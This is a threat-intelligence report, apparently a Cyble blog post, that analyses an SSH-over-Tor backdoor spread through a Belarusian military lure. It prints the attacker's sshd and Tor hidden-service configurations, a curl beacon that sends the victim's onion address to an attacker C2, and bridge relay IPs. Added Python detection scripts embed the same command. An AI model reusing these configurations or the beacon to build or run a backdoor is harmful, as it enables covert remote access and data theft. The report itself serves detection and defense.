CVE-2025-9242: A critical out-of-bounds write vulnerability affecting WatchGuard Fireware OS, specifically the iked process that handles IKEv2 VPN services. Successful exploitation could allow a remote, unauthenticated attacker to execute arbitrary code on vulnerable devices, potentially leading to full system compromise. 

CVE-2025-49844: Also known as "RediShell," a critical remote code execution (RCE) vulnerability in the Redis in-memory data store. It is a use-after-free memory corruption bug affecting Redis versions with Lua scripting (up to version 8.2.1). This vulnerability could allow an authenticated user to send a specially crafted Lua script that manipulates the garbage collector and triggers a use-after-free condition, potentially enabling the attacker to escape the Lua sandbox and execute arbitrary native code on the host system. 

ICS Vulnerabilities 

Cyble vulnerability researchers also flagged three industrial control system (ICS) vulnerabilities at risk of exploitation. They include: 

CVE-2025-9574, a 9.9-rated Missing Authentication for Critical Function vulnerability affecting ASKI Energy’s ALS-mini-s4 IP (serial number from 2000 to 5166) and ALS-mini-s8 IP (serial number from 2000 to 5166). Successful exploitation of the vulnerability could allow an attacker to gain full control over the device. 

CVE-2025-58428, a Command Injection vulnerability affecting Veeder-Root TLS4B versions prior to 11.A. The 9.9-rated flaw could allow an attacker to achieve remote command execution, full shell access, and potential lateral movement within the network. 

CVE-2024-11737, a 9.3-rated Improper Input Validation vulnerability affecting Schneider Electric Modicon Controllers M241 (versions prior to 5.2.11.29), Modicon Controllers M251 (versions prior to 5.2.11.29), Modicon Controllers M258 (versions prior to 5.0.4.19), and Modicon Controllers LMC058 (versions prior to 5.0.4.19). The flaw could allow an attacker to achieve remote command execution, full shell access, and potential lateral movement within the network. 

Conclusion 

The high number of critical and exploited vulnerabilities this week highlights the need for security teams to be able to respond with rapid, well-targeted actions to successfully defend IT and critical infrastructure. A risk-based vulnerability management program should be at the heart of those defensive efforts. 

Other cybersecurity best practices that can help guard against a wide range of threats include segmentation of critical assets; removing or protecting web-facing assets; Zero-Trust access principles; ransomware-resistant backups; hardened endpoints, infrastructure, and configurations; network, endpoint, and cloud monitoring; and well-rehearsed incident response plans. 

Cyble’s comprehensive attack surface management solutions can help by scanning network and cloud assets for exposures and prioritizing fixes, in addition to monitoring for leaked credentials and other early warning signs of major cyberattacks.

The post The Week in Vulnerabilities: Cyble Urges Apache, Microsoft Fixes appeared first on Cyble.

Weaponized Military Documents Deliver Advanced SSH-Tor Backdoor to Defense Sector https://cyble.com/blog/weaponized-military-documents-deliver-backdoor/ Fri, 31 Oct 2025 13:00:27 +0000 https://cyble.com/?p=103767 Germany

Executive Summary

In October 2025, Cyble Research and Intelligence Labs (CRIL) identified malware distributed as a weaponized ZIP archive masquerading as a military document titled "ТЛГ на убытие на переподготовку.pdf" (TLG for departure for retraining.pdf).  

Notably, the attack utilized a Belarusian military lure document targeting Special Operations Command personnel specializing in UAV/Drone operations, suggesting intelligence collection operations focused on regional military capabilities.

This multi-stage attack employs advanced evasion techniques, including double file extensions, anti-sandbox checks, and obfuscated PowerShell execution, to establish persistent backdoor access on targeted systems. The malware deploys a complex infrastructure that combines OpenSSH for Windows with a customized Tor hidden service, featuring obfs4 traffic obfuscation.

This provides threat actors with anonymous remote access via SSH, RDP, SFTP, and SMB protocols. The infection chain, shown in Figure 1 below, outlines the stages of the attack.

Figure 1 - Infection chain

At the time of this writing, CRIL successfully connected via SSH to confirm the backdoor functionality. However, no secondary payloads or post-exploitation actions were seen.

CRIL assesses with moderate confidence that this October 2025 sample has similarities with the December 2024 Army+ campaign attributed to UAC-0125/Sandworm (APT44).

Key Takeaways

  • This attack uses nested ZIP archives, LNK file disguises, and anti-sandbox checks to bypass automated detection systems. The malware validates system characteristics before execution, terminating in analysis environments while proceeding on genuine user machines.
  • The implementation of advanced pluggable transport effectively hides Tor traffic as normal network activity, making detection significantly more challenging. This represents a major evolution from standard Tor protocols used in previous campaigns.
  • Attackers access SSH, RDP, SFTP, and SMB via concealed Tor services, enabling full system control while preserving anonymity. All communications are directed through anonymous addresses using pre-installed cryptographic keys.
  • The lure document targets Belarusian Air Force drone experts, suggesting intelligence gathering on regional UAV capabilities or a potential false flag to obscure attribution.
  • The TTPs used in this attack closely align with those of Sandworm (alias APT44/UAC-0125), a Russian-linked APT. However, since no targeting pattern has yet been observed, we cannot positively attribute it with high confidence at this stage.

Threat Attribution

The broader context of this attack aligns with intelligence reporting from Ukraine's CERT-UA and SSSCIP, which documented over 3,000 cyber incidents in the first half of 2025, many of which leveraged AI-generated phishing content and increasingly sophisticated malware. Given the source and the phrasing of the lure, it would be premature at this stage to presume that this attack is targeting Russia or Belarus.

Its tactical patterns, overlapping infrastructure, and evolution from the December 2024 Army+ campaign demonstrate the continuous improvement of proven techniques used by Sandworm. The persistent targeting of military units also aligns with that campaign.

In addition, the TTPs align with those used by Sandworm, specifically Unit 74455. Since 2013, it has conducted numerous cyberattacks against Ukraine's military and critical infrastructure. Key operations include the BlackEnergy attacks, which resulted in power outages in 2015; the large-scale NotPetya malware outbreak in 2017; and the 2023 breach of Kyivstar, Ukraine's largest telecommunications provider.

The December 2024 Army+ fake installer campaign is a direct precursor to this example, demonstrating Sandworm's methodical targeting strategy. It involved using malicious NSIS installers spread through fake Cloudflare Workers sites, which deployed PowerShell scripts to create hidden SSH access via the Tor network.

This particular threat has tactical improvements over Sandworm's TTPs, indicating ongoing operational growth: the addition of obfs4 (obfuscated bridge protocol) to enhance secure Tor communication, the implementation of scheduled tasks for dependable persistence, and the strategic use of pre-generated RSA keys instead of generating them on the spot to minimize detection risk and operational footprint. These updates demonstrate the TA's (Threat Actor) adaptability and its commitment to enhancing operational security in response to defensive actions and evolving detection capabilities.

CRIL assesses with moderate confidence that this October 2025 sample has similarities with the December 2024 Army+ campaign attributed to UAC-0125/Sandworm (APT44).

Technical Analysis

The malicious ZIP archive file named "ТЛГ на убытие на переподготовку.pdf" employs a double extension technique to masquerade as a legitimate PDF document, exploiting user trust in common file formats to initiate the attack chain.

Upon extraction of the ZIP archive, the victim is presented with two components: an LNK (Windows shortcut) file bearing the same Russian filename "ТЛГ на убытие на переподготовку.pdf" and a hidden directory named "FOUND.000". (See Figure 2)

Figure 2 - Files inside the archive

This hidden folder contains an additional archive file titled "persistentHandlerHashingEncodingScalable.zip", which is crucial in the subsequent execution stages.

LNK Execution Chain

When the victim attempts to open what appears to be a PDF document, the LNK file triggers instead, executing embedded PowerShell commands stored within its target section. (See Figure 3)

Figure 3 - LNK file

This social engineering technique leverages the user's expectation of viewing a legitimate military document while covertly initiating the malicious payload.

PowerShell Execution

The PowerShell code embedded within the LNK file performs several critical operations. First, it utilizes the Expand-Archive command to extract the contents of "persistentHandlerHashingEncodingScalable.zip" from the Downloads folder into the %appdata%\logicpro directory. Following successful extraction, the script retrieves content from a file named "adaptiveOptimizingDeployingDecodingEncrypting" located within the newly created directory structure.

Finally, this retrieved content is executed through an additional hidden PowerShell instance, effectively establishing the next stage of the attack while maintaining stealth through obfuscated execution methods. (see Figure 4)

Figure 4 - Contents of the hidden PowerShell

Automated analysis check:

The second-stage PowerShell script incorporates simple anti-analysis checks designed to evade detection in sandbox and automated analysis environments. The malware verifies two specific system conditions before proceeding with the infection chain: it confirms that the number of recent LNK files present on the system is greater than or equal to 10 and validates that the current process count exceeds or equals 50.

These checks serve as environmental awareness mechanisms, as sandbox environments typically exhibit fewer user-generated shortcuts and reduced process activity compared to genuine user workstations. If either condition fails to meet the threshold, the script terminates execution, effectively bypassing automated malware analysis systems. (See Figure 5)

Figure 5 - 2nd stage PowerShell script

Upon successful validation of the environmental checks, the PowerShell script retrieves and displays a PDF document stored within the %appdata%\logicpro directory. This document serves as a decoy, maintaining the illusion of legitimacy while malicious operations proceed in the background.

Lure Document Analysis and Target Profile

The decoy PDF reveals a specific targeting strategy focused on the Belarusian military sector. The document’s potential targets are likely personnel within the Special Operations Command of the Belarusian Air Force (CCO BC) who possess operational expertise in unmanned aerial vehicle (UAV) or drone operations. However, at the time of publication, we cannot be sure. (see Figure 6)

Figure 6 - Lure PDF file

Background Execution and Persistence

While the victim reviews the decoy PDF document, the malware initiates its primary attack sequence in the background. The threat actor establishes persistence through a sophisticated scheduled task mechanism designed to ensure continuous access to the compromised system.

Scheduled Task Implementation

The PowerShell script leverages the Register-ScheduledTask cmdlet to create persistence, utilizing an XML configuration file extracted from the initial ZIP archive. This scheduled task is configured with dual trigger mechanisms: it executes immediately upon user logon and subsequently runs at regular intervals every day at 10:21 AM UTC.

Following registration, the script immediately initiates the scheduled task to begin operations without requiring a system restart.

Figure 7 – Creating a Scheduled Task
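An audit of a Task Scheduler XML export for the persistence traits described above, as an added example that is not the report's own code: it lists the triggers and executed commands and flags execution from a user-writable path combined with the logon-plus-daily trigger pair. The task XML is a constructed sample shaped after the report's description; the `-f` argument (sshd's config-file flag) and the path patterns are assumptions.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample: the shape of the task the report describes (logon trigger plus a
# daily 10:21 UTC trigger launching the renamed OpenSSH binary from %APPDATA%\logicpro).
# The attacker's actual XML is not reproduced in the report; '-f' is an assumption.
# Real exports are UTF-16 with a BOM: read them with open(path, encoding="utf-16").
TASK_XML = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
    </LogonTrigger>
    <CalendarTrigger>
      <StartBoundary>2025-10-01T10:21:00Z</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>%APPDATA%\logicpro\githubdesktop.exe</Command>
      <Arguments>-f controllerGatewayEncrypting</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Locations a vendor-installed task almost never executes from (analyst assumption).
USER_WRITABLE = re.compile(
    r"(%appdata%|%localappdata%|%temp%|%public%|\\appdata\\|\\temp\\)", re.I
)


def local(tag):
    """Strip the XML namespace from an element tag."""
    return tag.split("}", 1)[-1]


def audit_task(xml_text):
    """Summarise a Task Scheduler XML document and flag the report's persistence traits:
    a command under a user-writable path, and a logon trigger paired with a calendar one."""
    root = ET.fromstring(xml_text)
    triggers = [local(t.tag) for t in root.findall("t:Triggers/*", NS)]
    actions = []
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        actions.append((cmd, args))
    findings = []
    for cmd, args in actions:
        if USER_WRITABLE.search(cmd):
            findings.append(f"executes from user-writable path: {cmd} {args}".strip())
    if "LogonTrigger" in triggers and "CalendarTrigger" in triggers:
        start = root.findtext(
            "t:Triggers/t:CalendarTrigger/t:StartBoundary", default="", namespaces=NS
        )
        findings.append(f"logon trigger combined with calendar trigger starting {start}")
    return {"triggers": triggers, "actions": actions, "findings": findings}


if __name__ == "__main__":
    report = audit_task(TASK_XML)
    print("triggers:", report["triggers"])
    for cmd, args in report["actions"]:
        print("action:", cmd, args)
    for f in report["findings"]:
        print("FLAG:", f)
```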

Task 1: SSH Service Deployment

The first scheduled task executes the command shown in Figure 8.

Figure 8 – Scheduled task 1

Despite its benign filename suggesting legitimate software, `githubdesktop.exe` is actually the OpenSSH for Windows binary. Because it carries a valid Microsoft digital signature, it is less likely to be flagged by security tooling. The executable launches with the configuration file `controllerGatewayEncrypting` as a parameter, establishing an SSH service that listens on port 20321 bound to localhost (127.0.0.1).

The configuration implements strict security measures by disabling password authentication entirely, permitting only RSA key-based authentication for remote access.

SSH Configuration:

The configuration file `controllerGatewayEncrypting` contains the following critical parameters:

Port 20321
ListenAddress 127.0.0.1
HostKey redundantOptimizingInstanceVariableLogging
PubkeyAuthentication yes
PasswordAuthentication no
AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing
Subsystem sftp AppData\Roaming\logicpro\ebay.exe

This configuration restricts authentication to pre-deployed authorized keys stored in `redundantExecutingContainerIndexing`, ensuring that only the threat actor possessing the corresponding private key can establish SSH connections. Additionally, the SFTP subsystem is configured using `ebay.exe`, enabling file transfer capabilities for data exfiltration.

Task 2: Tor Network Implementation with Obfs4 Bridge

The second scheduled task establishes anonymous network communication through the Tor network (see Figure 9).

Figure 9 - Scheduled task 2

The `pinterest.exe` binary is a customized Tor executable that launches with the configuration file `pipelineClusterDeployingCluster`. This configuration establishes a Tor hidden service (.onion address). It implements port forwarding for multiple critical Windows services, enabling the threat actor to access various system resources through the anonymized Tor network.

Tor Hidden Service Configuration:

HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/"
HiddenServicePort 20322 127.0.0.1:20321    # SSH service
HiddenServicePort 11435 127.0.0.1:445      # SMB/File sharing
HiddenServicePort 13893 127.0.0.1:3389     # RDP - Remote Desktop Protocol
HiddenServicePort 12192 127.0.0.1:12191
HiddenServicePort 14763 127.0.0.1:14762
GeoIPFile geoip
GeoIPv6File geoip6

Obfs4 Transport Layer for Traffic Obfuscation:

A critical enhancement in this attack is the implementation of obfs4 (obfuscation version 4) pluggable transport, representing a significant evolution from the December 2024 Army+ campaign. The configuration includes:

ClientTransportPlugin obfs4 exec confluence.exe

The obfs4 protocol disguises Tor traffic as innocuous network communications, significantly complicating network-based detection efforts. The confluence.exe executable handles the obfs4 transport layer, while two bridge relays located at 77.20.116.133:8080 and 156.67.24.239:33333 provide entry points into the Tor network. The inclusion of GeoIP databases enables geographic routing analysis and potential refinement of targeting.
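A defender-side triage of the two configuration files quoted above (the sshd_config under "SSH Configuration" and the torrc under "Tor Hidden Service Configuration"), as an added example that is not CRIL's tooling: it parses both keyword-value formats, flags the loopback-only non-standard sshd port, the AppData-hosted authorized keys file and the renamed sftp binary, and lists which local services the hidden service exposes. The sample configs are reconstructed from the report; the sensitive-port list and the expectation that sftp is served by sftp-server.exe are assumptions.

```python
import re

# Constructed samples reconstructed from the two configurations quoted in the report.
SSHD_CONFIG = r"""Port 20321
ListenAddress 127.0.0.1
HostKey redundantOptimizingInstanceVariableLogging
PubkeyAuthentication yes
PasswordAuthentication no
AuthorizedKeysFile AppData\Roaming\logicpro\redundantExecutingContainerIndexing
Subsystem sftp AppData\Roaming\logicpro\ebay.exe
"""

TORRC = r"""HiddenServiceDir "socketExecutingLoggingIncrementalCompiler/"
HiddenServicePort 20322 127.0.0.1:20321    # SSH service
HiddenServicePort 11435 127.0.0.1:445      # SMB/File sharing
HiddenServicePort 13893 127.0.0.1:3389     # RDP
HiddenServicePort 12192 127.0.0.1:12191
HiddenServicePort 14763 127.0.0.1:14762
GeoIPFile geoip
GeoIPv6File geoip6
ClientTransportPlugin obfs4 exec confluence.exe
"""

# Local services whose exposure through an onion address is a strong backdoor signal
# (assumption: this list is the analyst's choice, not taken from the report).
SENSITIVE_PORTS = {445: "SMB", 3389: "RDP", 22: "SSH", 5985: "WinRM"}


def parse_kv(text):
    """Both sshd_config and torrc are 'Keyword value...' files. Return
    {keyword_lower: [[values], ...]} with comments and blank lines dropped."""
    table = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            key, *vals = line.split()
            table.setdefault(key.lower(), []).append(vals)
    return table


def sshd_ports(cfg):
    """Numeric Port directives from a parsed sshd_config."""
    return [int(v[0]) for v in cfg.get("port", []) if v and v[0].isdigit()]


def triage_sshd(text):
    """Flag the sshd traits the report describes: non-standard loopback-only port,
    key-only auth with an AuthorizedKeysFile under AppData, and a renamed sftp binary."""
    cfg = parse_kv(text)
    findings = []
    ports = sshd_ports(cfg)
    if any(p != 22 for p in ports):
        findings.append(f"sshd listening on non-standard port(s) {ports}")
    listen = [v[0] for v in cfg.get("listenaddress", []) if v]
    if listen and all(a.startswith("127.") or a == "::1" for a in listen):
        findings.append("sshd bound to loopback only (reachable through a tunnel, not the LAN)")
    pw = [v[0].lower() for v in cfg.get("passwordauthentication", []) if v]
    keys = " ".join(" ".join(v) for v in cfg.get("authorizedkeysfile", []))
    if pw == ["no"] and re.search(r"appdata", keys, re.I):
        findings.append("key-only auth with AuthorizedKeysFile inside a user AppData directory")
    for v in cfg.get("subsystem", []):
        if len(v) >= 2 and v[0].lower() == "sftp" and not v[1].lower().endswith("sftp-server.exe"):
            findings.append(f"sftp subsystem handled by unexpected binary {v[1]}")
    return findings


def triage_torrc(text, extra_sensitive=()):
    """Flag hidden-service forwards to sensitive local ports and pluggable-transport use.
    extra_sensitive lets the caller add ports learned from sshd_config."""
    cfg = parse_kv(text)
    sensitive = dict(SENSITIVE_PORTS)
    for p in extra_sensitive:
        sensitive.setdefault(p, "local sshd from sshd_config")
    findings = []
    for v in cfg.get("hiddenservicedir", []):
        hs_dir = v[0].strip('"') if v else "?"
        findings.append(f"hidden service directory {hs_dir}")
    for v in cfg.get("hiddenserviceport", []):
        if not v:
            continue
        target = v[-1]                       # "127.0.0.1:445" or a bare port number
        lport = int(target.rsplit(":", 1)[-1])
        if lport in sensitive:
            findings.append(f"onion port {v[0]} forwards to local {lport} ({sensitive[lport]})")
    for v in cfg.get("clienttransportplugin", []):
        if "exec" in (x.lower() for x in v):
            findings.append(f"pluggable transport configured: {' '.join(v)}")
    return findings


def triage(sshd_text, torrc_text):
    """Combine both files so a Tor forward to the sshd port is recognised as such."""
    return {
        "sshd": triage_sshd(sshd_text),
        "tor": triage_torrc(torrc_text, extra_sensitive=sshd_ports(parse_kv(sshd_text))),
    }


if __name__ == "__main__":
    for section, items in triage(SSHD_CONFIG, TORRC).items():
        print(section)
        for item in items:
            print("  -", item)
```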

Command and Control

Following the successful establishment of the hidden service, the malware constructs a unique .onion URL hostname identifying the compromised system. This hostname is then exfiltrated to the threat actor's command-and-control infrastructure using the following curl command:

curl --retry 1000 --retry-delay 3 --retry-all-errors -m 120 -s --socks5-hostname localhost:9050 <Attacker’s onion url>/lst?q=<host name>:<victim’s tor domain>:3-yeeiyem

This command transmits critical information, including the victim's username, the newly generated Tor hidden service hostname (taibdsgqlwvnizgipp4sn7xee72qys3pufih3rjzhx3e5b5t245kafid.onion), and a campaign identifier.

The curl command is configured with aggressive retry logic (1000 attempts with 3-second delays) to ensure reliable delivery even under adverse network conditions. All traffic is routed through the local Tor SOCKS5 proxy on port 9050 to maintain operational security.
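Detection logic for the beacon pattern above, run over constructed process command lines, as an added example that is neither the report's telemetry nor CRIL's tooling: it recognises curl routed through the local Tor SOCKS port to a .onion URL, flags the aggressive retry policy, and pulls the <user>:<victim onion>:<campaign id> fields out of the q= parameter. The attacker's onion address is not in the report, so a placeholder stands in for it.

```python
from urllib.parse import urlparse, parse_qs

TOR_SOCKS_PORTS = {"9050", "9150"}   # default SOCKS ports of the tor daemon and Tor Browser
PROXY_FLAGS = {"--socks5-hostname", "--socks5", "--socks4a", "--socks4", "-x", "--proxy"}
# curl options that consume the following argument, so it is never mistaken for the URL
VALUE_FLAGS = PROXY_FLAGS | {"--retry", "--retry-delay", "-m", "--max-time",
                             "-o", "--output", "-H", "--header", "-d", "--data"}

VICTIM_ONION = "taibdsgqlwvnizgipp4sn7xee72qys3pufih3rjzhx3e5b5t245kafid.onion"  # from the report

# Constructed command lines as a process-creation log would record them. The attacker's
# C2 onion address is not in the report, so a placeholder is used.
SAMPLE_CMDLINES = [
    "curl --retry 1000 --retry-delay 3 --retry-all-errors -m 120 -s "
    "--socks5-hostname localhost:9050 "
    f"attacker-c2-placeholder.onion/lst?q=jdoe:{VICTIM_ONION}:3-yeeiyem",
    "curl -s https://example.com/health",
    "curl.exe --socks5-hostname localhost:9050 https://check.torproject.org/",
]


def analyse_curl(cmdline):
    """Return None for non-curl command lines, else a dict describing proxy use, onion
    destination, retry policy, the decoded q= beacon fields and an overall verdict."""
    argv = cmdline.split()   # the beacon carries no quoted arguments, so a plain split suffices
    if not argv:
        return None
    exe = argv[0].rsplit("\\", 1)[-1].rsplit("/", 1)[-1].lower()
    if exe not in ("curl", "curl.exe"):
        return None
    proxy, retries, url = None, 0, None
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in VALUE_FLAGS and i + 1 < len(argv):
            value = argv[i + 1]
            if arg in PROXY_FLAGS:
                proxy = value
            elif arg == "--retry" and value.isdigit():
                retries = int(value)
            i += 2
            continue
        if not arg.startswith("-"):
            url = arg              # first non-option token is the target URL
        i += 1
    target = url or ""
    if target and "://" not in target:
        target = "http://" + target   # curl defaults to http when no scheme is given
    parsed = urlparse(target)
    host = (parsed.hostname or "").lower()
    proxy_port = proxy.rstrip("/").rsplit(":", 1)[-1] if proxy else ""
    result = {
        "tor_proxy": proxy_port in TOR_SOCKS_PORTS,
        "onion_url": host.endswith(".onion"),
        "aggressive_retry": retries >= 100,
        "beacon": None,
    }
    parts = parse_qs(parsed.query).get("q", [""])[0].split(":")
    if result["onion_url"] and len(parts) == 3 and parts[1].endswith(".onion"):
        result["beacon"] = {"user": parts[0], "victim_onion": parts[1], "campaign": parts[2]}
    if result["tor_proxy"] and result["onion_url"]:
        result["verdict"] = "c2_beacon"
    elif result["tor_proxy"]:
        result["verdict"] = "tor_proxy_use"
    else:
        result["verdict"] = "benign"
    return result


def scan(cmdlines):
    """Apply analyse_curl to each log line; return (line_index, result) for non-benign hits."""
    hits = []
    for idx, line in enumerate(cmdlines):
        r = analyse_curl(line)
        if r and r["verdict"] != "benign":
            hits.append((idx, r))
    return hits


if __name__ == "__main__":
    for idx, r in scan(SAMPLE_CMDLINES):
        print(idx, r["verdict"], r["beacon"])
```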

Attacker Command and Control Operations

Upon receiving the victim's .onion URL through the command-and-control channel, the threat actor gains comprehensive remote access capabilities to the compromised system. The attack infrastructure utilizes pre-generated RSA private keys that were embedded within the original malicious archive, eliminating the need for on-the-fly key generation and reducing the operational footprint that could trigger detection mechanisms. (see Figures 10 and 11)

Figure 10 - SOCKS Proxy

PuTTY was configured with the localhost SOCKS5 proxy settings, and the extracted RSA private key was converted to PPK format using PuTTYgen for authentication. (see Figure 11)

Figure 11 - Putty connection

In our simulation, SSH connectivity was successfully established to the test system after completing the proxy and authentication setup. The connection provided full command-line access through the Tor-anonymized channel, confirming the backdoor's operational functionality. Figure 12 shows the active SSH session, demonstrating how threat actors achieve remote access to compromised systems.

Figure 12 - SSH connection to the victim host

Remote Desktop Protocol (RDP): The threat actor can establish graphical remote desktop sessions by connecting to port 13893 on the victim's .onion address, which forwards to the local RDP service on port 3389. This provides full interactive desktop access for manual operations.

Secure File Transfer Protocol (SFTP): The exposed SFTP subsystem enables bidirectional file transfer capabilities, allowing the threat actor to exfiltrate sensitive documents, deploy additional malware payloads, or modify system configurations without detection.

Server Message Block (SMB) File Sharing: Access to port 11435 (forwarding to local SMB port 445) enables network file share enumeration and access, facilitating lateral movement within networked environments and large-scale data exfiltration operations.

This multi-protocol access framework provides the threat actor with flexible operational capabilities tailored to specific mission objectives, whether conducting intelligence collection, establishing persistence for long-term access, or preparing for destructive operations.

The backdoor was tested by establishing a controlled SSH connection using the extracted RSA keys and setting up a Tor SOCKS5 proxy. During monitoring, no secondary payloads, post-exploitation commands, or lateral movement were detected, indicating the operation is likely still in reconnaissance or surveillance before active exploitation.

Conclusion

This October 2025 attack showcases the ongoing evolution of state-sponsored cyber espionage targeting military personnel in Eastern Europe. The sophisticated, multi-step infection process combines social engineering with technical countermeasures and relies on an anonymous command-and-control infrastructure. This demonstrates Sandworm's ongoing enhancements and commitment to maintaining covert access within military networks.

Implementing obfs4-obfuscated Tor communications makes network detection significantly more challenging, so defense teams should focus on analyzing endpoint behavior, monitoring process execution, and auditing scheduled tasks.

Military units and Defense sector organizations are vulnerable to social engineering attacks that utilize realistic-looking military documents.

While the TTPs align with known campaigns and threat actors, we are continuing to collect additional intelligence and evidence to accurately attribute this activity to the associated threat actor.

Recommendations

  • Strengthen Email Filtering and User Training: Implement sophisticated email security measures to identify nested archives and files with double extensions. Train personnel to verify document authenticity through secondary channels before opening attachments with military themes. Establish clear protocols for handling unexpected official documents received via unofficial channels.
  • Deploy Behavioral Endpoint Detection: Implement EDR solutions with behavioral analytics to detect suspicious PowerShell execution, unauthorized scheduled tasks, and processes listening on non-standard ports. Configure alerts for binaries executing from AppData directories and applications making localhost SOCKS proxy connections.
  • Block Tor Network Communications: Implement network controls to detect and block Tor traffic, including obfs4 obfuscated connections. Maintain updated threat intelligence feeds with Tor relay IP addresses and deploy deep packet inspection to identify anonymization protocols. Apply egress filtering to prevent unauthorized use of anonymization networks.
  • Monitor Scheduled Task Creation: Restrict scheduled task privileges to administrators and monitor all new task creations. Enable Windows Event Log alerting for scheduled tasks executing scripts or binaries from user directories. Conduct regular audits of existing tasks and implement application control policies to restrict unauthorized executables.
  • Implement SSH Key Management Controls: Deploy centralized SSH key management and monitor for unauthorized OpenSSH installations on Windows endpoints. Audit authorized_keys files regularly and alert on SSH services listening on non-standard ports. Monitor for unusual, localhost-originated RDP, SMB, and SFTP connections that indicate tunneled command-and-control activity.
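As an added example (not code from Cyble or from the CERT-UA advisory), the script below turns three of the endpoint checks above into rules and runs them over constructed, Sysmon-style telemetry records: scheduled tasks whose action runs from a user profile directory, an OpenSSH daemon listening on a port other than 22, and processes connecting to a SOCKS port on localhost. The record field names and sample values are assumptions chosen to resemble Sysmon event data, not a real schema; the masquerade file names come from the report, and the SOCKS ports are Tor's defaults (9050, 9150) plus the conventional 1080.

```python
"""Behavioural endpoint rules for the SSH-over-Tor tradecraft described above.

Added example, not Cyble's or CERT-UA's code. Field names in the telemetry
records are assumptions modelled on Sysmon events, not a real schema.
"""
import re
from dataclasses import dataclass

# Paths under a user profile from which legitimate services rarely execute.
USER_PROFILE_DIRS = re.compile(
    r"^c:\\users\\[^\\]+\\appdata\\(roaming|local|locallow)\\", re.IGNORECASE
)
# Ports used by local SOCKS proxies (Tor daemon 9050, Tor Browser 9150, classic 1080).
LOCAL_SOCKS_PORTS = {9050, 9150, 1080}
# Standard SSH port; an sshd listening elsewhere on a workstation is suspicious.
SSH_STANDARD_PORT = 22
# Original file names from PE version info; the report notes these binaries were
# renamed (e.g. sshd.exe shipped as githubdesktop.exe), so match on the original.
SSH_ORIGINAL_NAMES = {"sshd.exe", "ssh.exe", "sftp-server.exe", "obfs4proxy.exe"}


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def check_scheduled_task(event):
    """Rule 1: a newly created task whose action runs a binary from a user profile dir."""
    command = event.get("task_command", "")
    if USER_PROFILE_DIRS.search(command):
        return Finding("scheduled_task_from_user_profile", event["host"],
                       f"task {event.get('task_name')!r} runs {command}")
    return None


def check_listener(event):
    """Rule 2: a binary that is really OpenSSH/obfs4 (by original file name) listening off port 22."""
    original = event.get("original_file_name", "").lower()
    port = event.get("local_port")
    if original in SSH_ORIGINAL_NAMES and port != SSH_STANDARD_PORT:
        return Finding("ssh_daemon_nonstandard_port", event["host"],
                       f"{event.get('image')} ({original}) listening on {port}")
    return None


def check_localhost_socks(event):
    """Rule 3: an outbound connection from a process to a SOCKS port on localhost."""
    if event.get("dest_ip") in {"127.0.0.1", "::1"} and event.get("dest_port") in LOCAL_SOCKS_PORTS:
        return Finding("localhost_socks_connection", event["host"],
                       f"{event.get('image')} -> {event.get('dest_ip')}:{event.get('dest_port')}")
    return None


# Dispatch on the (assumed) event type field.
RULES = {
    "scheduled_task": check_scheduled_task,
    "listen": check_listener,
    "network_connect": check_localhost_socks,
}


def evaluate(events):
    """Apply the rule matching each event's type and return all findings in order."""
    findings = []
    for ev in events:
        rule = RULES.get(ev.get("type"))
        if rule is None:
            continue
        hit = rule(ev)
        if hit:
            findings.append(hit)
    return findings


# Constructed sample telemetry: one malicious and one benign record per rule.
SAMPLE_EVENTS = [
    {"type": "scheduled_task", "host": "WS01", "task_name": "Updater",
     "task_command": r"C:\Users\alice\AppData\Roaming\gh\githubdesktop.exe -f sshd_config"},
    {"type": "scheduled_task", "host": "WS01", "task_name": "GoogleUpdate",
     "task_command": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /c"},
    {"type": "listen", "host": "WS01", "image": r"C:\Users\alice\AppData\Roaming\gh\githubdesktop.exe",
     "original_file_name": "sshd.exe", "local_port": 2222},
    {"type": "listen", "host": "SRV01", "image": r"C:\Windows\System32\OpenSSH\sshd.exe",
     "original_file_name": "sshd.exe", "local_port": 22},
    {"type": "network_connect", "host": "WS01", "image": r"C:\Users\alice\AppData\Roaming\gh\githubdesktop.exe",
     "dest_ip": "127.0.0.1", "dest_port": 9050},
    {"type": "network_connect", "host": "WS01", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_ip": "142.250.0.1", "dest_port": 443},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.detail}")
```

Run against the sample records, the three malicious events produce findings and the three benign ones do not. Matching on the PE original file name rather than the on-disk name is what defeats the renaming described in the report, but version info can be stripped or edited, so treat each rule as one signal to correlate with the others (a task from AppData that also opens a local SOCKS connection) rather than a standalone verdict.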

MITRE TTPs

| Tactic Name (Tactic ID) | Technique Name (Technique ID) | Simplified Procedure |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566) | Malicious ZIP archive disguised as a PDF military document |
| Execution (TA0002) | User Execution: Malicious File (T1204.002) | The victim opens the LNK file, believing it to be a legitimate PDF document |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | LNK file executes embedded PowerShell commands to extract and execute a malicious payload |
| Persistence (TA0003) | Scheduled Task/Job: Scheduled Task (T1053.005) | Creates scheduled tasks triggering on logon and daily at 10:21 AM UTC to maintain persistence |
| Defense Evasion (TA0005) | Masquerading: Match Legitimate Name or Location (T1036.005) | Uses legitimate software names (githubdesktop.exe, pinterest.exe) to disguise malicious binaries |
| Defense Evasion (TA0005) | Virtualization/Sandbox Evasion (T1497) | Checks for a minimum of 10 LNK files and 50 processes to detect sandbox environments |
